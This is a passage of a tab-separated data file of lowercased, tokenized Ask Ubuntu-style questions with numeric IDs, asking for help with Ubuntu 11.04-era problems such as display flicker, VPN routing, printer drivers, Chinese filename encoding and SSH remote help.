nomodeset ) . previously i never had to do that . now what should i do ? i 'm writing this post from my windows installation , wich booted normally , and where it does n't seem like the graphic card is damaged or something . actually this laptop is a working machine . so i 'm kinda hot here . thanks for reading this .
48074	u1 client for kde	is there u1 client available for kde ? just signed up for u1 to sync with my android phone , but ca n't find a client for kde desktop environment . if not available i 'll have to unsubribe and switch to drobbox or something similar .
48075	how do i troubleshoot s-video + audio jack output not working in ubuntu ?	i connect my laptop to my tv using s-video + audio jack . this worked perfectly in ubuntu 10.10 but has stopped working in ubuntu 11.04 . i have tried switching from ubuntu ( unity ) to ubuntu ( no effects ) and ubuntu classic , but it still does n't work . ubuntu recognises that a second monitor is attached and picks the correct resolution . the tv screen remains blue as though there is no signal . the audio does n't come through either . i have checked the cables are plugged in correctly , and the connection into the tv works ( replacing the laptop with a dvd player works ) . i am using an intel graphics card , not nvidia . any suggestions on further troubleshooting steps ?
48077	how do i add an offline encyclopedia to an edubuntu livecd ?	i am serving in the peace corps in a poor spanish speaking country . i manage several small computer labs . for reasons of limited networking , old computers , and unreliable electricity , i decided that the best solution for teaching computers here is to have the computers boot up to edubuntu live cds . the learning games ca n't be beat for the price . however , i need to make modifications in the livecds for this to happen , and i 'm not sure what is the easiest way to do this . specifically , the most important changes i need to make is : to remove the install option in boot up . to add an offline encyclopedia . i figured out that the best offline encyclopedia option is a copy of wikipedia . since i need a spanish language wikipedia , i 'm probably going to go with evopedia . although if someone has a better suggestion i 'm all ears . what i 'm not certain of is how to add it to the live cd . much of this i 'm just going to have to figure out for myself , but a few pointers should would help . do i just add the .deb packages to the `` pool '' folder ? that seems too easy . i 've been playing with isomaster , which is fine for adding whole files , but no so good for editing them . do i need to do this from a command line ? or is the best way to build a pc the way i want it and then make an iso image of it ? if so , how do i make it bootable ? i know a few things about linux , but i 'm not a guru , so please have sympathy on someone who just wants to do some good in the world .
48079	accessing ubuntu 's password store using c++	i 'm trying to write an application in c++ that uses the ubuntu one oauth token stored in the gnome keyring , but i ca n't find any documentation on either the gnome or ubuntu one developer sites that tell me how to do this . the ubuntu one site says that all requests to the ubuntu one service must be signed with a valid ubuntu one oauth token , but it does n't say how to go about this . the gnome api reference for the keyring api simply runs off a list of functions without any context or , more importantly , the # include directive that i 'm supposed to use to get those functions into my program . does anyone know where i can find any documentation that helps me access the ubuntu one oauth token ?
48081	how much data do i need to download to upgrade to a new version of ubuntu ?	i have a limited download plus upload at full band width then it drops to 68 kb/s . what is the total size downloaded when i upgrade to a new ubuntu version ? will i be able to do it with 8 gig left for this month or should i wait till next month when i am given more than 30 gig ?
48086	how do i choose the default guest session ?	my computer has an ati card , which supports 3d , but does n't refresh the screen properly . this is because i use the classic session on 11.04 instead of unity . that 's ok . but when i start a guest session , the unity-based session starts automatically , because this are the default settings for new users . so , is there any way to change the session to start by default ? ( so the classical gnome desktop gets launched instead of unity )
48088	how do i input text in tamil ?	i would like to type a non-latin script language tamil in ubuntu 10.10 i have installed , ibus , added all the tamil packages in synaptic , and installed tamil in languages support , i still ca n't get it to work . any suggestion ?
48089	window buttons vanish after upgrading metacity packages	i am using unity . today i upgraded some metacity packages to the latest version with synaptic package manager . after restarting the window buttons are gone , but the borders are still present . see the screen shot : i do n't want to use emerald .
48090	how do i set a solid color desktop in awesome3 ?	i 'm using version 3.4.9 ( smack )
48092	displaying notifications on top-right of primary monitor	i 'm using natty 11.04 64bit , classic mode . i do n't like the default setup of having two gnome panels - one on top , one on bottom ( seems like a waste of screen estate ) i basically merge both panels into a single panel at the bottom , in this arrangement : [ main menu ] | [ running apps ] [ indicator applet ] with this setup , all notifications are being displayed in the top-right of my secondary monitor , usually causing me to turn my head to read them , or missing the notification altogether . as a test , i created a new gnome panel , and positioned it at the top of my screen , so i had mirrored the default setup . i then moved the indicator applet from the bottom panel into the top one . when i received notifications , they were being displayed under the indicator applet , in the position i would like to see them . is there any way to get this behaviour with a single gnome panel at the bottom ? i really do n't want the top bar . i 've posted two screenshots that should help demonstrate what i mean : http : //postimage.org/image/29mb9dzfo/ http : //postimage.org/image/29mcwxbxg/
48098	traffic not tunneling through networkmanager vpn client , but vpnc works fine	i 'm trying to connect to a vpn using the networkmanager cisco vpn client , and everything seems to be going fine when connecting . i click connect , the nm icon on the top panel displays the connecting animation , and notifyosd displays the banner informing me that i 've successfully connected ( i.e. , the vpn server displays it 's welcome message ) , and i get a little padlock next to the wireless connection icon . yet traffic does n't go through the vpn . my ip address is still the same , and the ads that appear on the different websites i browse recognize my location . however , when i connect using sudo vpnc myvpnsettingsfile.conf from the terminal , i do it successfully here , but this time my traffic does get tunneled through the vpn . what causes this different and what can i tweak to make the networkmanager client work ? ( it 's not the end of the world if i have to do it through the command line , but the nm-applet integration gives me that padlock icon , and the fewer clicks take less time than opening a terminal and getting the command right . ) thanks in advance .
48099	is it better to upgrade or to reinstall ubuntu server ?	i 'm running lamp on ubuntu server 10.04.2 lts 64 bit and want to switch to 11.04 . why i want to switch is out of scope for this question . what is a better choice and why : to upgrade or to re-install ? for me `` better '' means performance , manageability and stability of the resulting system . do n't hesitate to suggest your criteria : )
48100	my dash does not show recent applications . what can i do to fix that ?	for some unknown reason , my unity dash does n't show recent applications . i am guessing it could be related to the fact that i have a newer version of zeitgeist than the standard repo provides ( i use a ppa ) . that is the only unusual detail i can think of . what can i do to get back recent applications in the dash ?
48103	icons on the panel and launcher are the wrong color	i have an icon problem with ubuntu natty : the ones on the panel are all black ; the icons on the launcher have some color , but are n't all the right icons . it has been this way since i installed natty . every once in awhile when i start the computer i have nice colored icons on the panel and the launcher . i have two editor icons on the launcher , and they both will usually have the same icon , but when the colored icons are on the panel the editor icons are different , as they should be . can someone tell me how to keep the proper icons at boot time ?
48106	how to open a man page using gnome-do ?	is there a way to use gnome-do to launch some man page in the help gui ? or some other two-click approach i could employ ? i can open help and then use ctrl+l to open man : find -- can i make that even faster ?
48110	nxserver : nxnode uses 100 % cpu	i am using nomachine 's nxserver . installed with these packages : nxclient_3.5.0-6_amd64.deb nxnode_3.5.0-3_amd64.deb nxserver_3.5.0-4_amd64.deb the server machine is ubuntu 11.04 , the client machines are windows xp laptop and windows vista desktop . initially everything starts/works fine , but at some point a few hours afterwards an nxnode process stays at 100 % cpu . if i manually kill that pid , then an nxclient process comes up at 100 % cpu ( which btw , i do n't know why it would be needing to run in the first place ... but i do know it 's a dependency for the server , so ... anyways ) if i manually kill that pid as well , then everything goes back to normal . i have waited several hours after that and i still do n't see either of those two eating 100 % . do note that , killing the above two processes did not cause any trouble with my nxclient connection . after a reboot of that machine though , it starts anew . google fails to give relevant results/solution to the issue unfortunately . ( it does n't like the % sign ) has anyone had a similar experience ? any ideas on how it may be fixed or pointers to any relevant posts regarding this would be appreciated . p.s . consider this post as round 3 of this post : d
48111	how can i help someone ( like granny ) over ssh who is behind a nat router ?	for helping others quickly , ssh is very useful , especially combined with gnu screen . it 's common that users are behind a nat router . even if the user can configure the router , it takes some time to remember the password , find the right options , etc . so , what is the easiest way to help others over ssh if they 're behind a nat router ? i currently tell people to open a terminal run the below command and pass me their ip from a site like http : //ip.appspot.com/ : sudo apt-get install openssh-server ssh-import-id & & ssh-import-id lekensteyn obviously , this is not going to work if they 're behind a nat router or have a personal firewall configured . so , is there something like : sshd -- accept-help-from lekensteyn i 'm not looking for alternatives like teamviewer , just a shell like ssh . it should be open-source too .
48115	which netbook : atom or fusion ?	i am looking to buy a netbook that will last for a few years . it will be used for browsing and i want it to be snappy . seeing as rendering and video decoding will be making more use of the gpu going forward , i have been paying attention to amd 's new fusion platform hoping that it will provide solid graphics performance where the intel gma3150 is supposed to be weak . however , the atom is supposed to have the faster cpu . i know it 's early days , with fusion only getting full support in the kernel with natty , so which platform would you recommend ?
48116	installing an hp laserjet 1000	i 've already installed hplip , it printed a test page , but it wo n't print from any program . it shows the printer in the list of printers , and it 's checked as the default printer . i 've restarted a couple times . when i plugged the usb cable for the printer into the computer after installing hplip , it said printer detected . then after a couple seconds it said the printer was ready for use . when i send something to the printer , a pop-up shows that a document was sent to the printer - but there 's a triangle with an exclamation point in it next to the message . a few seconds another pop-up indicates that the printer has completed printing the job but it did n't print anything .
48117	how to install gfortran ?	i installed sage on ubuntu but nothing on the command line executes . the relevant portion in the long error message is : importerror : libgfortran.so.3 : can not open shared object file : no such file or directory error importing ipy_profile_sage - perhaps you should run % upgrade ? warning : loading of ipy_profile_sage failed . i tried sudo apt-get install gfortran and sudo apt-get install libgfortran.so.3 but neither seem to work . i tried the ubuntu software center gui but it seems broken as it keeps showing the rotating wait prompt even though my net is working . i 'm a bit stuck . thanks .
48129	how to create a restricted ssh user for port forwarding ?	ăśndrăźk suggested a reverse connection for getting an easy ssh connection with someone else ( for remote help ) . for that to work , an additional user is needed to accept the connection . this user needs to be able to forward his port through the server ( the server acts as proxy ) . how do i create a restricted user that can do nothing more than the above described ? the new user must not be able to : execute shell commands access files or upload files to the server use the server as proxy ( e.g . webproxy ) access local services which were otherwise not publicly accessible due to a firewall kill the server summarized , how do i create a restricted ssh user which is only able to connect to the ssh server without privileges , so i can connect through that connection with his computer ?
48130	encoding and decoding error in non-english name of compressed file	i have a rar file . after extraction , it generates a file with chinese name which is shown in nautilus as : ��������ѧ.������.����������ѧ������.2008.djvu ( invalid encoding ) in terminal it is shown as : < bd > < fc > < b4 > < fa > < d7 > < e9 > < ba > < cf > ѧ. < cd > < f5 > < cc > < ec > < c3 > < f7 > . < b4 > < f3 > < c1 > < ac > < c0 > < u+de64 > < b4 > < f3 > ѧ < b3 > < f6 > < b0 > < e6 > < c9 > < e7 > .2008.djvu the content of the rar file listed by unrar is correct : $ unrar l 近代组合学.王天明.大连理工大学出版 社.2008.rar unrar 3.93 freeware copyright ( c ) 1993-2010 alexander roshal archive 近代组合学.王天明.大连理工大学出版社.2008.rar name size packed ratio date time attr crc meth ver -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 近代组合学.王天明.大连理工大学出版社.2008.djvu 6190416 6187189 99 % 03-06-11 10:33 ... ..a . 98320d40 m3g 2.9 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 1 6190416 6187189 99 % the file can not be open unless i change its name to be something like 1.djvu . i was wondering why the characters are not shown properly with chinese name of compressed file , while i can create a directory or file with chinese name ? how shall i do ? thanks and regards !
48140	compatible version of `` adobe shockwave player ? ''	is there a ubuntu compatible version of the `` adobe shockwave player ? '' i 'm running firefox and when i try to bring up one of my school 's websites it says missing plugin . when i click on `` install missing plug-in '' it says none found , so when i click on manually install plug-in it takes me to adobe shockwave player installation , but there is no ubuntu version to install ? ? ? on the firefox plug-in finder service it says `` unknown plugin ( application/x-director )
48145	how do i fix the locale problems that seems to turn up when i use vpss	on my vps , when i type locale for a new user i get the following : tarmac @ vps48 : ~/log $ locale locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory lang=en_us.iso-8859-15 language=en_us : en lc_ctype= '' en_us.iso-8859-15 '' lc_numeric= '' en_us.iso-8859-15 '' lc_time= '' en_us.iso-8859-15 '' lc_collate= '' en_us.iso-8859-15 '' lc_monetary= '' en_us.iso-8859-15 '' lc_messages= '' en_us.iso-8859-15 '' lc_paper= '' en_us.iso-8859-15 '' lc_name= '' en_us.iso-8859-15 '' lc_address= '' en_us.iso-8859-15 '' lc_telephone= '' en_us.iso-8859-15 '' lc_measurement= '' en_us.iso-8859-15 '' lc_identification= '' en_us.iso-8859-15 '' lc_all= this obviously is n't correct because it throws me all sorts of warnings . how do i fix this ?
48147	installed 11.04 flickers horribly	i installed ubuntu 11.04 yesterday and i can only use ubuntu classic with no effects , because when i go on the normal ubuntu it flickers and stuff . my card is intel 82865g . i have tried adding i915 modeset or something to the grub but it makes my resolution really small . i do n't know what to do . this never happened in 9.10 10.04 or 10.10 .
48149	how to `cat` filename returned by `which` ?	i answered this question but realize that it could be better . how can i convert : $ which gjslint $ cat /usr/local/bin/gjslint into something like this : $ cat < which gjslint -bash : which : no such file or directory ..so that the output path+filename from which is passed onto cat which then does it 's thing ( i.e . printing the contents of the filename to the screen ) .
48151	is there a way to tell what encoding is used for the name and content of a file ?	is there a way to tell what encoding is used for the name and content of a file ? both gui and terminal solutions ( preferred ) are fine . thanks and regards !
48158	chinese encoding in names of compressed files in zip	sorry for asking a question similar to my previous one . the difference from the last question is that now it is in a zip archive where chinese encoding in names of compressed files are not recognized , both after extraction and after listing the content of the zip archive : $ unzip -l `` 严蔚敏数据结构 ( c语言版 ) 教材及答案.zip '' archive : 严蔚敏数据结构 ( c语言版 ) 教材及答案.zip length date time name -- -- -- -- - -- -- -- -- -- -- -- - -- -- 25600 2000-01-04 23:27 ? + ? +i- ? ? - ? .doc 80896 2000-01-04 23:27 ? + ? ? i- -+.doc 41984 2000-01-04 23:27 ? ++ ? i- i+ ? ? ? ? - ? .doc 52224 2000-01-04 23:27 ? + ? +i- ? ? i ? .doc 50688 2000-01-04 23:27 ? + ? ? i- ? ? ? ? ? ? .doc 54272 2000-01-04 23:27 ? ++ ? i- - ? ? ? ? - ? ? ? ? ? ? .doc 26112 2000-01-04 23:27 ? + ? -i- ? ? ? ? ? ? ? ? ? _+ ? .doc 76288 2000-01-04 23:27 ? +- ? i- - ? ? - ? ? ? ? - ? .doc 53760 2000-01-04 23:27 ? +- ? i- -+ ? +++ ? =.doc 53760 2000-01-04 23:27 ? + -- i- ? ? .doc 7929077 2009-02-26 22:49 - ? ? ? ? ? ? ? +c ? ? ? ? + ? ? + ? + ? +pdf.pdf -- -- -- -- - -- -- -- - 8444661 11 files i was wondering how to deal with this problem ? thanks and regards ! update : i have uploaded this zip archive to and it can be downloaded from http : //www.mediafire.com/ ? dw87ee72m56evy9 i tried to use chardet to determine the encoding of the names of the compressed files by : $ unzip -l `` 严蔚敏数据结构 ( c语言版 ) 教材及答案.zip '' | chardet < stdin > : utf-8 ( confidence : 0.99 ) but are the file names indeed encoded in utf-8 ? are n't they supposed to be in a foreign encoding ? i guess the output by unzip -l are too much , and how shall i only single out the filenames in its output as input to chardet ?
48159	how does gnome know which applications support gio and gvfs ?	how does gnome know which applications support gio and gvfs ? example : i open a text file in gedit , gvfs is used transparently , but if i open it in kate ( kde equivalent ) , it will automatically map to ~/.gvfs/ < path_to_file >
48175	why are n't there viruses in all linux based systems ?	i only need an article which explain why we do n't have viruses in all linux based systems ? and also explain if we can make some in the future of these most secure systems ?
48178	apache 2 module configuration error	i 'm trying to install sml server in my machine . after following all the instructions ( located here and at this book at 2.2 chapter ) i try to configure apache by adding a new module like this : a new sml.conf file was added with : < ifmodule mod_sml.c > addhandler sml-module .sml smlprjid `` web '' smlpath `` /usr/lib/smlserver/www/ '' smlinitscript `` /usr/lib/smlserver/web_sys/init.sml '' < /ifmodule > and the new sml.load file with the following data : loadmodule sml-module /usr/lib/apache2/modules/mod_sml.so the mod_sml.so library was taken from here . then when trying to restart apache i receive these error message : sudo apache2ctl restart apache2 : syntax error on line 204 of /etc/apache2/apache2.conf : syntax error on line 1 of /etc/apache2/mods-enabled/sml.load : can not load /usr/lib/apache2/modules/mod_sml.so into server : /usr/lib/apache2/modules/mod_sml.so : undefined symbol : log any ideas/suggestions are greatly appreciated .
48180	no internet access when using a pptp vpn server	i 've followed the tutorial on this site : http : //forums.bit-tech.net/showthread.php ? t=132029 i have a dd-wrt router with micro-fw that does not have a built-in vpn server . i have port forwarded the port 1723 tcp to my ubuntu box . my dd-wrt router 's dhcp ranges from 192.168.1.100 - 199 . the problem is that i can connect to my vpn server and access all the network shares and computers but i can not access the internet . i am not too sure why this is happening . please let me know if you want to see any of the files . i have set the /etc/pptpd.conf : localip 192.168.1.102 remoteip 192.168.1.190-198 do i need to manage my dhcp on my ubuntu box as well or is that okay ? i am a beginner , any help is appreciated !
48181	installing epson stylus nx125 drivers ?	does anyone know how to install drivers for my epson stylus nx125 all in one printer/scanner on ubuntu ? my windows xp hard drive was attacked by a virus and it locked up my applications so my cousin installed ubuntu on my second 20 gig drive to access e-mail/internet
48183	how to burn a dvd which is playable in an external player ?	i have several .dvd files which were created using openshot video editor . to export the videos from openshot , i used the dv-ntsc widescreen and dv-pal widescreen property . can anyone tell me how i can burn these *.dvd files into a dvd that can be played with my external sony cd/dvd 5.1 player which is connected to a tv ?
48184	logging into empathy after enabling two stage verification in google	i have enabled two stage verification in my google account . this has prevented me from logging into gtalk via empathy . any solutions ?
48187	backup project hamster data	i 'd like to move my project hamster time tracking data from one pc to another . how would i go about that ? thanks .
48189	how can i enable autoplay to work even when the screen is locked ?	i have been setting up my machine to automatically rip a cd upon insertion and create a bunch of different formats . so far this works great but i have noticed that the autoplay only works if i am logged into the desktop and the screen is unlocked . ideally i would like to be able to just throw a cd in the drive whenever i walk past the machine . having to unlock the screen adds makes this operation take somewhat longer . how can i enable autoplay to work even when the screen is locked ?
48191	how can i repair a new kernel version and omit the `` previous linux versions '' from grub ?	a few days ago , i upgraded to a new kernel . unfortunately , before the installation was finished , the computer froze and i had to restart it forcefully . now , in grub , it shows the new kernel and below it a `` previous linux versions '' item . whenever i boot into the new kernel , i get my screen flickering . several daemons start , but it freezes there ; it never gets me to the display manager . fortunately , the items under `` previous linux versions '' work . from there , i want to reinstall the new kernel . i tried from searching in the /var/cache/apt/archives/ directory and installed all the kernel related files there ; that did n't work -- i still get the new kernel version that does n't work and the previous linux versions item . i tried through synaptic , the results were the same . i ran sudo update-grub , but that did n't do anything how can i upgrade my kernel to the newest version and eliminate the `` previous linux versions '' item ? i am using 11.04 with amd64 architecture .
48195	tilda - can i make it close on lose focus ?	can i make tilda ( or any window for that matter ) close on lose focus ? i like tilda better than guake but i like the close on lose focus of guake setting . is there a compiz setting i 've forgotten about ? or something else ?
48200	download all ubuntu packages	i will be using ubuntu on a computer without internet connection . is it possible to download from some place all ( or most of the ) ubuntu packages for my distrubution ( and it 's version ) ? i 'd like to download it as an iso image or zip archive ( not individually every package ) and burn on dvd . thank you for advice
48201	window-borders disappears in unity	recently i found that window borders keep disappearing intermittently in unity ! especially when either google chrome or mozilla thunderbird are running . is there a way out ?
48206	is e4rat safe to use and will it really increase boot speed ?	e4rat is said to increase the boot speed on ext4 filesystems . however , it requires the ureadahead component of ubuntu to be disabled . will it really make my computer start faster and is it safe to try ?
48210	how to apply master font and color to existing slides in libreoffice impress	i created a master/template in impress by selecting : tools > options > libreoffice > colors to select colors for creating a new gradient format > area : gradients to create the gradient using the selected colors view > master > slide master in order to edit the slide master format > page to set the page background to that gradient finally saved the file as template in /.libreoffice/3/user/template i then opened an existing presentation and selected : format > slide design : load and added my template task pane : master pages ... right-clicked on my template to select apply to all slides the template gets applied somehow , but fonts and font colors are not applied to the existing slides . how does this work please ? or , is there a bug filed for this somewhere ? cheers !
48213	how to install an older version of transmission ?	i want to install transmission v2.22 in /opt in ubuntu natty but i do not want to remove the new version . is there a way to do it ?
48215	password not working in graphical applications ( gksu ) ? works with sudo	i am having a problem where when i try to run say gparted , when i am prompted for a password , it says `` incorrect password '' but when i enter the same password using terminal sudo gparted for example , it works . why is that ? update i noticed that theres a difference between using sudo and gksu . the later will fail with incorrect password ...
48218	banshee is still in the sound menu after unistalling	using 11.04 i uninstalled banshee from the software center , restarted the system but still it 's visible in the sound menu . how can i get rid of it ?
48225	ubuntu one wlan sync in the cloud	what are the expectations for ubuntu one developer team to turn on ubuntu one and cloud wifi sync capabilities in this platform ( ubuntu 11.04/11.10 ) , as apple did with icloud ? i think ubuntu one is great , but i do n't know if it 's in the plan to make wifi sync as important as it deserves ... i 'm thinking in all mobile devices , laptops , tablets ( like this and similars ) , etc ... i would like an app to use ubuntu one everytime , wherever i am , and for that wifi sync is crucial . for instance : i would synchronize with ubuntu one and fully automatic a bunch of programs will update too like : -banshee -gimp -inkscape -libreoffice what i want to know is if this is possible or irrealistic . thnx
48227	extract ( rip ) dvd in chapters and not in title	i 'm ripping a mozart dvd , but i only need to extract a few chapters ( tracks ) from it . i try to use dvdrip but it only extracts me the title ( the whole video ) . is there any program to do this ? thanks
48231	why compiz or unity refresh screen by every movement i do ?	it 's getting me crazy ! compiz or unity refresh screen ( like i run compiz -- replace or unity -- replace ) by every movement i do ( e.g ctrl+tab , super+w ) and somehow unexpectedly ! sometimes it failed to reload title bar and keyboard functions like ctrl+tab and alt+f2 stop working , and i had no chance but reboot ! sometimes it work without any problem . i could n't found any reason why this happen . i wanted to report a bug but i do n't have enough information about it .
48233	how to start gnome 2 manually ?	i need to start the gnome 2 desktop environment manually from scratch but have a few questions . this is an experiment , you can call it a school project . i need to make a /usr/share/xsessions entry that will start the gnome desktop without starting `` gnome-session '' but rather each app that is required manually . obviously , i will need a script because there are several applications that need to be launched . i know i need to start gnome-panel and networking , and nautilus , and gtk , could someone point me in the right direction as of how it should look like ( apps that need to be started and in what order ) ? thanks !
48235	nautilus image converter : strip exif metadata	i just found out that images can have more than 20kb of exif data . not really an issue with 2mb files , but if you have small thumbnails this really adds up . i use mogrify often to resize , and i can use mogrify -strip to remove the exif data . however , if i use nautilus image converter there is no way to strip this data . is there something in the configuration i can set so it always automatically adds the -strip flag to the command ?
48237	how can i prevent my system to freeze just after startup ?	i recently updated my system from ubuntu 10.10 to 11.04 . since then my computer freezes on startup . i believe my wireless card is the cause . when i turn it off , i can sometimes start without freeze yet this does n't always work . here is the output of `` sudo lshw -c network '' *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : 8c : a9:82:25:6e : a6 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=2.6.38-8-generic firmware=128.50.3.1 build 13488 ip=192.168.1.61 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:43 memory : c2400000-c2401fff does anyone know how to solve this issue ? thanks a lot in advance for any help ! i gladly provide more information if need be .
48240	custom bash prompt is buggy	i followed some articles on how to change the prompt , i 've got the result i was looking for , but when the cursor reach the end of the screen it does n't go new line and tab completion it 's strange . # ~/.bashrc # colorful , with time , history id and path ( also in window title ) export ps1= '' \ [ \e ] 0 ; \w\a\ ] \e [ 1 ; 36m\t-\ ! - \w > \e [ m `` anybody have got a clue on what am i doing wrong ?
48241	ubuntu one on webos device	what about a ubuntu one client for webos ? this an awesome operating system . already have a pre phone and i 'll have the touchpad . are you planning to release a webos client soon ?
48242	after apt-mirror	i 'm downloading packages with sudo apt-mirror . what should i do next to set packages being installed from the downloaded packages ? i ca n't even see where are the packages downloaded by default . i looked at /var/cache/apt/archives but it seems there are n't downloaded to this place . can i interrupt apt-mirror command and continue tommorrow where it was interrupted ? thank you
48243	why ca n't non-admin users install software ?	this is probably something i do n't understand since i am used to windows and am only starting out with ubuntu . i know that software in linux comes in packages what i do n't understand is why ca n't non-admin users install software . i mean , every application is run by a specific user , and that user will only be able to run that applciation with his privilages , so if he has no admin privileges , the application also wo n't be able to access unauthorized directories etc . i want most of the time to work on my pc with a non-admin user since it seems more safe to me , most of the time i have no need for admin privileges . and even though i know viruses in linux are uncommon i still think the best practice is to work on the computer in a state that you yourself can't make any changes to important files , that way viruses also ca n't harm any important files , but i need to install software for programming and web-design etc . and first of all i do n't want to switch users all the time . but also it sounds safer to me that everything being done on the pc will be done through the non-admin user . i 'll be glad to know what misunderstanding i have here , cause something here does n't sound right .
48245	webcam apps and ways of checking if webcam is working	what software is available for using webcams or ways of checking if my webcam is working correctly after installing ubuntu .
48251	interact with minecraft server	i have a minecraft sever running that gets started automatically using the init.d scripts . now i want to be able to give myself admin privileges but i need to send commands to the server . how can i do that without stopping it and running it manually ?
48252	installing a gta 4 with wine it says i didnt download it	i have playonlinux and a windows compatibility layer ... i tried to install gta 4 and after the download the icon said i did n't install anything . i made a launcher and it said the same thing . im technologically impaired , so i did n't notice anything wrong while installing . my brother said something about .exe files , but i do n't know what do with the knowledge that executable files may/may not relate to the lack of compatibility .
48253	what 's wrong with my bootchart ?	currently my ubuntu takes quite a bit to boot ~1min . windows is about the same , even faster i think . i installed bootchart and ran it but not sure what to make of the results . can someone take a quick look and suggest what could speed up my laptop 's boot time ? edit : i also have latest dmesg file here : http : //paste.ubuntu.com/624611/ image also updated after deleting all *.pack files
48257	how to obtain a white background for vim ( not gvim ) ?	i 've downloaded a variety of colorschemes for vim , but none of the white background colorschemes that i 've tried have worked in vim , only in gvim . i expect this has to do with the color limitations of the terminal . i do n't need 256 colors , but i would like a decent looking white background that gives some syntax highlighting in the regular ubuntu 11.04 terminal window . suggestions ?
48265	gmail task integration with evolution	is it possible to integrate gmail tasks with evolution 2.32.2 running on ubuntu 11.04 ? i 've had my calendar and contacts integrated for quite some time now but have been unsuccessful in getting tasks integrated . from what i 've read it may not even be possible , but i 'm unsure whether it 's a limitation of gmail or evolution , or whether it 's supposed to be fixed in the near term . thanks
48266	how to setup neatx ?	how can i setup neatx server on ubuntu natty ? i 'm looking for a step by step guide from a fresh natty installation .
48268	mail program for netbook	what mail programs fit on a netbook screen ? evolution is n't bad , but to , cc , and bcc are in fact too much . chris
48269	how can i change all files prefixes in one command ?	i need to change the postfixes of all files ( all the same .jpeg ) to .jpeg ( capital vs. lower case ) . is there a quick way of doing so ?
48278	how do i find out the correct amount of video ram of a radeon card when using the open source driver ?	i was surprised that lspci and the nvidia x server settings application did n't give me the same amount of video memory for my nvidia card . a bit of googling brought me to this site . there it says that lspci does n't show all the video memory . so for the nvidia cards i can use the nvidia x server settings application to find out the correct amount of video memory but how do i do it for a radeon card when using the open source radeon driver ?
48281	how do i know what to whitelist to allow my application into the system tray ?	i know how to whitelist applications so as to allow them into the unity system tray , but how do i figure out exactly what string i need to whitelist ? the application i 'm interested in is cdemu-tray , but a general answer would be nice .
48282	how to completely disable metacontacts support in empathy ?	i 've just googled , but i 've found nothing , so ... how to disable metacontacts at all ? i do n't want to use this feature . thanks .
48283	poor graphics performance due to wrong mtrr settings	i am using the latest kernel on a dell latitude e4310 with 8gbyte ram 2.6.38-10-generic # 44-ubuntu smp thu jun 2 21:32:22 utc 2011 x86_64 x86_64 x86_64 gnu/linux at boot i get the following message [ drm ] mtrr allocation failed . graphics performance may suffer . and indeed my /proc/mtrr looks strange reg00 : base=0x000000000 ( 0mb ) , size= 8192mb , count=1 : write-back reg01 : base=0x200000000 ( 8192mb ) , size= 512mb , count=1 : write-back reg02 : base=0x0e0000000 ( 3584mb ) , size= 512mb , count=1 : uncachable reg03 : base=0x0dc000000 ( 3520mb ) , size= 64mb , count=1 : uncachable reg04 : base=0x0db400000 ( 3508mb ) , size= 4mb , count=1 : uncachable reg05 : base=0x21c000000 ( 8640mb ) , size= 64mb , count=1 : uncachable i tried mtrr-uncover but it does not work : ./mtrr-uncover initial mtrr configuration : 0 0x000000000-0x1ffffffff write-back 4 0x0db400000-0x0db7fffff uncachable 3 0x0dc000000-0x0dfffffff uncachable 2 0x0e0000000-0x0ffffffff uncachable 1 0x200000000-0x21fffffff write-back 5 0x21c000000-0x21fffffff uncachable ./mtrr-uncover : 9 mtrrs needed but only 8 in architecture . does anybody know how to properly set the mtrr in my architecture ? here the relevant output of lspci -v 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 0410 flags : bus master , fast devsel , latency 0 , irq 42 memory at f0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 60b0 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915
48289	boots to a black screen when a microsoft wirless mobile mouse 3500 is plugged in	if i boot ubuntu 11.04 and i have a microsoft wirless mobile mouse 3500 plugged in , nothing happens after i reach the grub screen and select ubuntu for booting ( i get the grub screen at boot since i 'm dual booting ) . the screen just stays purple for a few seconds then goes black . i can access a terminal session and log in there . if i try to get back to the gui by hitting ctrl alt f7 i get some text about my graphics card i believe ( this is standard white on black text , and i do n't know how to get it off the screen without transcribing it ) . so far i can confirm the problem arises consistently when the mouse was on during the previous session ( last time the computer was booted ) , but turned off before the faulty boot . here is some of the text i see when the error occurs which might be relevant : [ 15.887693 ] process modprobe ( pid : 519 , threadinfo ffff88014529e000 , task ffff8801452c2dc0 ) then there is a call trace , so i guess something screwed up pretty good and the resulting lines include a lot of [ radeon ] , radeon_device , radeon_pci , radeon_driver , radeon_init ... which leads me to believe the error was caused by my video card , although it is certainly catalyzed by the mouse . is anything known about this ? should i make a bug report and if so how ? the bug report tool referred me to here as i had no idea what package to report .
48291	ubuntu display blanks during desktop load after wubi install on hp pavilion win 7 64 bit entertainment pc	ubuntu display goes blank after the initial bootup and load of the os on the windows 7 64bit hp pavilion entertainment pc . the installation proceeded without error , but during the boot i get an error ( goes by really fast and hard to see ) and then it gives me the desktop background screen , the music , ( no icons ) refreshes the video and goes blank . no mouse , no nothing . it looks as if it 's loading an incompatible video driver , but not sure how to check or correct this . when i boot up into cmd line mode , it works fine , loads and gives me the opportunity to log in , so the os is intact . any suggestions ? thanks so much !
48292	audio recording application that uses ladspa plugins ?	i 'm looking for a good recording application other than audacity that will work with the autotalent ladspa plugin . it keeps crashing whenever i apply the autotalent effect . audacity is working fine with all the other plugins , just not autotalent . or , is there a way to just keep audacity from crashing when i apply the effect ?
